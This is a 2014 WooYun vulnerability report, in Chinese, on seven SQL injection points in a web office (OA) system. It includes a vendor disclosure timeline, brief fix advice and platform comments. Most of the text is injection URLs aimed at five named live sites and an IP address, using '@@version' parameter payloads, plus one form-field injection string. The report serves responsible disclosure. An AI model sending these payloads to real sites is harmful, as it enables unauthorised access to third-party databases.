2014-06-16: 细节已通知厂商并且等待厂商处理中 2014-06-21: 厂商已经确认,细节仅向厂商公开 2014-06-24: 细节向第三方安全合作伙伴开放 2014-08-15: 细节向核心白帽子及相关领域专家公开 2014-08-25: 细节向普通白帽子公开 2014-09-04: 细节向实习白帽子公开 2014-09-14: 细节向公众公开
测着测着又发现7处注入
http://wooyun.org/bugs/wooyun-2014-065153
找着找着又发现了同样也找一些实例进行验证吧第一处
http://oa.gdjierong.com:8090/flow/flow_get_if_value.aspx?template_id=@@version
http://oa.mingshiedu.com:801/flow/flow_get_if_value.aspx?template_id=@@version
http://oa.ruvar.com/flow/flow_get_if_value.aspx?template_id=@@version
http://116.204.107.145:9000/flow/flow_get_if_value.aspx?template_id=@@version
http://www.kinghighway.com:9000/flow/flow_get_if_value.aspx?template_id=@@version
第二处
http://oa.gdjierong.com:8090/include/get_dict.aspx?bt_id=@@version
http://oa.mingshiedu.com:801/include/get_dict.aspx?bt_id=@@version
http://oa.ruvar.com/include/get_dict.aspx?bt_id=@@version
http://116.204.107.145:9000/include/get_dict.aspx?bt_id=@@version
http://www.kinghighway.com:9000/include/get_dict.aspx?bt_id=@@version
第三处
http://oa.gdjierong.com:8090/include/get_user.aspx
http://oa.mingshiedu.com:801/include/get_user.aspx
http://oa.ruvar.com/include/get_user.aspx
http://116.204.107.145:9000/include/get_user.aspx
http://www.kinghighway.com:9000/include/get_user.aspx
三个输入框都存在注入随便一个输入框处输入 点击查询
%' and (select @@version)>0) --
通过firebug抓包可看到存在注入
第四处
http://oa.gdjierong.com:8090/LHMail/email_attach_delete.aspx?attach_id=@@version
http://oa.mingshiedu.com:801/LHMail/email_attach_delete.aspx?attach_id=@@version
http://oa.ruvar.com/LHMail/email_attach_delete.aspx?attach_id=@@version
http://116.204.107.145:9000/LHMail/email_attach_delete.aspx?attach_id=@@version
http://www.kinghighway.com:9000/LHMail/email_attach_delete.aspx?attach_id=@@version
第5处
http://oa.gdjierong.com:8090/OnlineChat/chat_show.aspx?id=@@version
http://oa.mingshiedu.com:801/OnlineChat/chat_show.aspx?id=@@version
http://oa.ruvar.com//OnlineChat/chat_show.aspx?id=@@version
http://116.204.107.145:9000/OnlineChat/chat_show.aspx?id=@@version
http://www.kinghighway.com:9000/OnlineChat/chat_show.aspx?id=@@version
第六处
http://oa.mingshiedu.com:801/OnlineChat/chatroom_show.aspx?id=@@version
http://oa.gdjierong.com:8090/OnlineChat/chatroom_show.aspx?id=@@version
http://oa.ruvar.com/OnlineChat/chatroom_show.aspx?id=@@version
http://116.204.107.145:9000/OnlineChat/chatroom_show.aspx?id=@@version
http://www.kinghighway.com:9000/OnlineChat/chatroom_show.aspx?id=@@version
第七处
http://oa.gdjierong.com:8090/OnlineReport/get_condiction.aspx?t_id=@@version
http://oa.mingshiedu.com:801/OnlineReport/get_condiction.aspx?t_id=@@version
http://oa.ruvar.com/OnlineReport/get_condiction.aspx?t_id=@@version
http://116.204.107.145:9000/OnlineReport/get_condiction.aspx?t_id=@@version
http://www.kinghighway.com:9000/OnlineReport/get_condiction.aspx?t_id=@@version
漏洞证明如上 休息一下
对参数进行处理吧
危害等级:高
漏洞Rank:20
确认时间:2014-06-21 12:55
暂无
@xsser @Finger @疯狗 怎么走小厂商了 之前发的走大产商的 这个就走小产商?也不是故意刷漏洞什么的 确实是这系统注入比较多。。。
@what_news 嗯 考虑实际情况吧 容易刷屏.....
@xsser 都合集了 嗯好吧 哈哈也没事 坐等世界杯啦
@what_news :)